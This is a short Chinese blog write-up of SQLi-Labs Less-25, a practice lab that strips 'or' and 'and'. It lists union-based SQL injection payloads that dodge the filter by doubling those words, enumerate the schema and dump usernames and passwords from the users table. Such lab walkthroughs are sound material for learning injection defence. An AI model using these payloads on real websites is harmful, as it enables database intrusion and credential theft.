Less(25)Trick with OR & AND (过滤了or和and)

1.OR&AND欺骗

  (1)测试一下

    ?id=1' #

    

     ?id=1' --+

    

 

 

   看到id周围是单引号,但是第二种没有报错,可以注入

    

 

     看一下php,发现会把or 和and 转义成空格

2.--+绕过,双写or和and

  (1)爆库:?id=-1'  union select 1,2,database()--+

    

  (2)爆表:?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema="security" --+

    

  (3)爆列名:?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name="users" --+

    

  (4)爆值:

    ?id=-1' union select 1,2,group_concat(passwoorrd)from security.users --+

    

 

     ?id=-1' union select 1,2,group_concat(username)from security.users --+

    

 

 

 

 

            

posted @ 2020-02-24 16:48  孟雨  阅读(247)  评论(0)    收藏  举报